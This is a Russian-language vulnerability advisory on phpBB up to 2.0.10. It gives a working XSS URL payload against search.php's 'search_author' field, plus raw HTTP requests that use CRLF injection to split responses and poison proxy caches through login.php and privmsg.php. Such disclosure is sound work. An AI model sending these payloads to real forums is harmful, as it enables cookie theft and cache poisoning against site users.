Программа: phpBB до версии 2.0.10 

Уязвимость в phpBB позволяет удаленному пользователю выполнить XSS нападение. 

1. Сценарий /phpBB2/search.php не фильтрует HTML код в поле 'search_author'. Пример: 

http://SERVER/phpBB2/search.php?search_author ='<script>alert(document.cookie)</script>

Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям. Удаленный пользователь может отравить
кеш web-прокси. Уязвимы сценарии /phpBB2/privmsg.php и
/phpBB2/login.php.

Пример запроса: 

POST /phpBB2/login.php HTTP/1.0
Host: SERVER
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-Type: application/x-www-form-urlencoded
Content-length: 129

logout=foobar&redirect=foobar%0d%0a Content-Length:%200%0d%0a%0d%0aHTT P/1.0%20200%20OK%0d%0aContent-
Length:%207%0d%0a%0d%0aGotcha!

Еще пример: 

GET /phpBB2/privmsg.php?mode= foobar%0d%0aContent-Length:%200%0d%0a%0d 
%0aHTTP/1.0%20200%20OK%0d%0aContent- Length:%207%0d%0a %0d%0aGotcha!
HTTP/1.0
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Host: SERVER

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии